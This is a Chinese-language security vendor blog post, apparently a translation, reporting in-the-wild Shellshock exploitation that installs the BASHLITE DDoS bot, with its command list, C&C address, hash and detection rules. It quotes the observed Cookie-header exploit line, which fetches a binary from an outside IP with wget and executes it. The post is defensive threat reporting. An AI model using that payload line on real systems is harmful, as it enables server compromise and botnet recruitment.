Shellshock/bash 漏洞攻擊現身,ELF_BASHLITE.A可發動 DDoS 攻擊

Shellshock/bash 漏洞(包含在CVE-2014-7169)新聞爆發後短短幾個小時就出現了真實的漏洞攻擊事件。這一個漏洞可以讓人執行任意程式碼,從而影響系統安全。攻擊者可能做出的包括變更網站內容和網站程式碼、污損網站外貌,甚至是從資料庫竊取使用者資料以及其他更多事情。

趨勢科技發現了真實漏洞攻擊碼所帶來惡意軟體的樣本。偵測為ELF_BASHLITE.A(也被稱為ELF_FLOODER.W),此惡意軟體可以發動分散式阻斷服務(DDoS)攻擊。它所會執行的指令包括有:

  • PING
  • GETLOCALIP
  • SCANNER
  • HOLD 暫停或是延後攻擊一給定時間
  • JUNK 垃圾洪水攻擊
  • UDP 用UDP封包做分散式阻斷服務攻擊
  • TCP 用TCP封包做分散式阻斷服務攻擊
  • KILLATTK – 終止攻擊執行緒
  • LOLNOGTFO – 終止僵屍機器人

它也可以做到暴力法登入,讓攻擊者可以取得登入使用者和密碼的列表。根據我們的分析,ELF_BASHLITE.A也會連到 C&C伺服器 – 89[點]238[點]150[點]154[冒號]5。

點小圖可放大

圖1、威脅感染示意圖(點入以看大圖)

 

下面是用來帶入惡意軟體進到系統的程式碼: 

Cookie:().{.:;.};.wget.-O./tmp/besh.http://162[dot]253[dot]66[dot]76/nginx;.chmod.777./tmp/besh;./tmp/besh;

如同我們稍早發布的文章所討論過,此漏洞的嚴重性相當巨大,因為主要受影響的是網頁伺服器。它(此漏洞)也對萬物聯網(IoE ,Internet of Everything)設備帶來風險,因為用的是Linux(內含Bash)。據說它也影響到了比特幣(Bitcoin)/比特幣採礦,因此攻擊者很有可能會透過此途徑來建立起「Botnet傀儡殭屍網路」機器人大軍。

趨勢科技主動式雲端截毒服務  Smart Protection Network可以保護使用者免於上面所提到的BASHLITE變種威脅。我們會繼續觀察是否有其他漏洞攻擊針對此弱點。

透過網路來對Shellshock漏洞進行攻擊的企圖可以透過下列Deep Discovery規則偵測到:

  • 1618 – Shellshock HTTP REQUEST

其他趨勢科技產品(趨勢科技的OSCE、IWSVA和PC-cillin)都可以將此網路行為偵測為CVE-2014-6271-SHELLSHOCK_REQUEST。

此外,趨勢科技的Deep Security可以透過以下DPI規則來保護使用者免於此Bash漏洞威脅:

  • 1006256 – GNU Bash Remote Code Execution Vulnerability

其他想要檢查自己是否受到影響的使用者可以查看我們的Shellshock免費防護。想知道更多可能的Shellshock漏洞攻擊情景,請參考我們的文章 – Shellshock – 它有多嚴重?

此次攻擊的相關雜湊值是0229e6fa359bce01954651df2cdbddcdf3e24776。

 

@原文出處:Bash Vulnerability (Shellshock) Exploit Emerges in the Wild, Leads to BASHLITE Malware

趨勢科技會持續提供關於此漏洞的更新,使用者可以的到這裡來獲得最新資訊。

Bash Shell TM940x312_0926